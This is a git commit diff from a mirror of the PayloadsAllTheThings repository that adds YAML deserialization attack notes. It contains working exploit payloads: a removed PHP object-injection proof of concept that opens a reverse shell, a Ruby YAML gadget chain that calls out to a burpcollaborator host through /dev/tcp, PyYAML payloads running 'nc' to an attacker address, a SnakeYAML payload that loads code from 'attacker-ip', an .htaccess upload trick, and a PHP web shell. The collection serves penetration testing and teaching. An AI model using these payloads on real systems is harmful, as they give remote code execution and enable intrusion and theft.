mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
YAML Deserialization
This commit is contained in:
parent
e677f07197
commit
267713c0fb
9 changed files with 162 additions and 69 deletions
1
.gitignore
vendored
1
.gitignore
vendored
|
@ -1,4 +1,3 @@
|
||||||
BuildPDF/
|
BuildPDF/
|
||||||
.vscode
|
.vscode
|
||||||
.todo
|
.todo
|
||||||
AWS Amazon Lambda/
|
|
|
@ -1,32 +0,0 @@
|
||||||
<?php
|
|
||||||
/*
|
|
||||||
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
|
|
||||||
|
|
||||||
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
|
|
||||||
|
|
||||||
Shouts to @jstnkndy @yappare for the assist!
|
|
||||||
|
|
||||||
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
|
|
||||||
*/
|
|
||||||
|
|
||||||
print "==============================================================================\r\n";
|
|
||||||
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
|
|
||||||
print "==============================================================================\r\n";
|
|
||||||
print "[+] Generating serialized payload...[OK]\r\n";
|
|
||||||
print "[+] Launching reverse listener...[OK]\r\n";
|
|
||||||
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
|
|
||||||
|
|
||||||
class PHPObjectInjection
|
|
||||||
{
|
|
||||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
|
||||||
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
|
||||||
}
|
|
||||||
|
|
||||||
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
|
|
||||||
$url = $url . urlencode(serialize(new PHPObjectInjection));
|
|
||||||
print "[+] Sending exploit...[OK]\r\n";
|
|
||||||
print "[+] Dropping down to interactive shell...[OK]\r\n";
|
|
||||||
print "==============================================================================\r\n";
|
|
||||||
$response = file_get_contents("$url");
|
|
||||||
|
|
||||||
?>
|
|
19
Insecure Deserialization/Files/ruby-serialize.yaml
Normal file
19
Insecure Deserialization/Files/ruby-serialize.yaml
Normal file
|
@ -0,0 +1,19 @@
|
||||||
|
---
|
||||||
|
- !ruby/object:Gem::Installer
|
||||||
|
i: x
|
||||||
|
- !ruby/object:Gem::SpecFetcher
|
||||||
|
i: y
|
||||||
|
- !ruby/object:Gem::Requirement
|
||||||
|
requirements:
|
||||||
|
!ruby/object:Gem::Package::TarReader
|
||||||
|
io: &1 !ruby/object:Net::BufferedIO
|
||||||
|
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||||
|
read: 0
|
||||||
|
header: "abc"
|
||||||
|
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||||
|
socket: &1 !ruby/object:Gem::RequestSet
|
||||||
|
sets: !ruby/object:Net::WriteAdapter
|
||||||
|
socket: !ruby/module 'Kernel'
|
||||||
|
method_id: :system
|
||||||
|
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
|
||||||
|
method_id: :resolve
|
|
@ -11,7 +11,7 @@
|
||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
|
||||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||||
|
|
||||||
```java
|
```java
|
||||||
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
||||||
|
@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay
|
||||||
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
|
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
|
||||||
```
|
```
|
||||||
|
|
||||||
payload | author | dependencies | impact (if not RCE)
|
```ps1
|
||||||
------|--------|------ |------
|
Payload Authors Dependencies
|
||||||
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5
|
------- ------- ------------
|
||||||
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
|
||||||
Clojure |@JackOfMostTrades |clojure:1.8.0
|
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
|
||||||
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||||
CommonsCollections1 |@frohoff |commons-collections:3.1
|
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
|
||||||
CommonsCollections2 |@frohoff |commons-collections4:4.0
|
Clojure @JackOfMostTrades clojure:1.8.0
|
||||||
CommonsCollections3 |@frohoff |commons-collections:3.1
|
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||||
CommonsCollections4 |@frohoff |commons-collections4:4.0
|
CommonsCollections1 @frohoff commons-collections:3.1
|
||||||
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
|
CommonsCollections2 @frohoff commons-collections4:4.0
|
||||||
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1
|
CommonsCollections3 @frohoff commons-collections:3.1
|
||||||
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
|
CommonsCollections4 @frohoff commons-collections4:4.0
|
||||||
Groovy1 |@frohoff |groovy:2.3.9
|
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
|
||||||
Hibernate1 |@mbechler|
|
CommonsCollections6 @matthias_kaiser commons-collections:3.1
|
||||||
Hibernate2 |@mbechler|
|
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
|
||||||
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
|
||||||
JRMPClient |@mbechler|
|
Groovy1 @frohoff groovy:2.3.9
|
||||||
JRMPListener |@mbechler|
|
Hibernate1 @mbechler
|
||||||
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
Hibernate2 @mbechler
|
||||||
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||||
Jdk7u21 |@frohoff|
|
JRMPClient @mbechler
|
||||||
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2
|
JRMPListener @mbechler
|
||||||
MozillaRhino1 |@matthias_kaiser |js:1.7R2
|
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||||
Myfaces1 |@mbechler|
|
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||||
Myfaces2 |@mbechler|
|
Jdk7u21 @frohoff
|
||||||
ROME |@mbechler |rome:1.0
|
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
|
||||||
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
MozillaRhino1 @matthias_kaiser js:1.7R2
|
||||||
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
MozillaRhino2 @_tint0 js:1.7R2
|
||||||
URLDNS |@gebl| | jre only vuln detect
|
Myfaces1 @mbechler
|
||||||
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
|
Myfaces2 @mbechler
|
||||||
|
ROME @mbechler rome:1.0
|
||||||
|
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||||
|
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||||
|
URLDNS @gebl
|
||||||
|
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
|
||||||
|
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
|
||||||
|
```
|
||||||
|
|
||||||
## Burp extensions using ysoserial
|
## Burp extensions using ysoserial
|
||||||
|
|
||||||
|
@ -69,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:
|
||||||
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
|
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
|
||||||
|
|
||||||
```java
|
```java
|
||||||
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||||
|
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
|
||||||
|
|
||||||
where
|
where
|
||||||
-a - generates/tests all payloads for that marshaller
|
-a - generates/tests all payloads for that marshaller
|
||||||
|
@ -101,6 +109,8 @@ Payload generators for the following marshallers are included:<br />
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||||
|
- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
||||||
|
- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
||||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||||
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||||
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
||||||
|
|
|
@ -8,6 +8,7 @@ Check the following sub-sections, located in other files :
|
||||||
* [PHP (Object injection) : phpggc, ...](PHP.md)
|
* [PHP (Object injection) : phpggc, ...](PHP.md)
|
||||||
* [Ruby : universal rce gadget, ...](Ruby.md)
|
* [Ruby : universal rce gadget, ...](Ruby.md)
|
||||||
* [Python : pickle, ...](Python.md)
|
* [Python : pickle, ...](Python.md)
|
||||||
|
* [YAML : PyYAML, ...](YAML.md)
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
@ -60,3 +60,4 @@ Universal gadget for ruby 2.x - 3.x.
|
||||||
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
|
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
|
||||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
||||||
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
||||||
|
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
89
Insecure Deserialization/YAML.md
Normal file
89
Insecure Deserialization/YAML.md
Normal file
|
@ -0,0 +1,89 @@
|
||||||
|
# YAML Deserialization
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Exploit](#exploit)
|
||||||
|
* [PyYAML](#pyyaml)
|
||||||
|
* [ruamel.yaml](#ruamelyaml)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [SnakeYAML](#snakeyaml)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
|
||||||
|
* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
|
||||||
|
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
|
||||||
|
|
||||||
|
## Exploit
|
||||||
|
|
||||||
|
### PyYAML
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
!!python/object/apply:time.sleep [10]
|
||||||
|
!!python/object/apply:builtins.range [1, 10, 1]
|
||||||
|
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
|
||||||
|
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
|
||||||
|
!!python/object/new:subprocess [["ls","-ail"]]
|
||||||
|
!!python/object/new:subprocess.check_output [["ls","-ail"]]
|
||||||
|
```
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
!!python/object/apply:subprocess.Popen
|
||||||
|
- ls
|
||||||
|
```
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
!!python/object/new:str
|
||||||
|
state: !!python/tuple
|
||||||
|
- 'print(getattr(open("flag\x2etxt"), "read")())'
|
||||||
|
- !!python/object/new:Warning
|
||||||
|
state:
|
||||||
|
update: !!python/name:exec
|
||||||
|
```
|
||||||
|
|
||||||
|
## Ruamel.yaml
|
||||||
|
|
||||||
|
## Ruby
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
---
|
||||||
|
- !ruby/object:Gem::Installer
|
||||||
|
i: x
|
||||||
|
- !ruby/object:Gem::SpecFetcher
|
||||||
|
i: y
|
||||||
|
- !ruby/object:Gem::Requirement
|
||||||
|
requirements:
|
||||||
|
!ruby/object:Gem::Package::TarReader
|
||||||
|
io: &1 !ruby/object:Net::BufferedIO
|
||||||
|
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||||
|
read: 0
|
||||||
|
header: "abc"
|
||||||
|
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||||
|
socket: &1 !ruby/object:Gem::RequestSet
|
||||||
|
sets: !ruby/object:Net::WriteAdapter
|
||||||
|
socket: !ruby/module 'Kernel'
|
||||||
|
method_id: :system
|
||||||
|
git_set: sleep 600
|
||||||
|
method_id: :resolve
|
||||||
|
```
|
||||||
|
|
||||||
|
## SnakeYAML
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
!!javax.script.ScriptEngineManager [
|
||||||
|
!!java.net.URLClassLoader [[
|
||||||
|
!!java.net.URL ["http://attacker-ip/"]
|
||||||
|
]]
|
||||||
|
]
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
|
||||||
|
* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
|
||||||
|
* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
|
||||||
|
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
||||||
|
* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
|
|
@ -0,0 +1 @@
|
||||||
|
AddType application/x-httpd-php .rce
|
|
@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess
|
||||||
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
|
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
# .htaccess simple php
|
||||||
|
|
||||||
|
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
|
||||||
|
Then upload any file with `.rce` extension.
|
||||||
|
|
||||||
# .htaccess upload as image
|
# .htaccess upload as image
|
||||||
|
|
||||||
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
|
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
|
||||||
|
|
Loading…
Reference in a new issue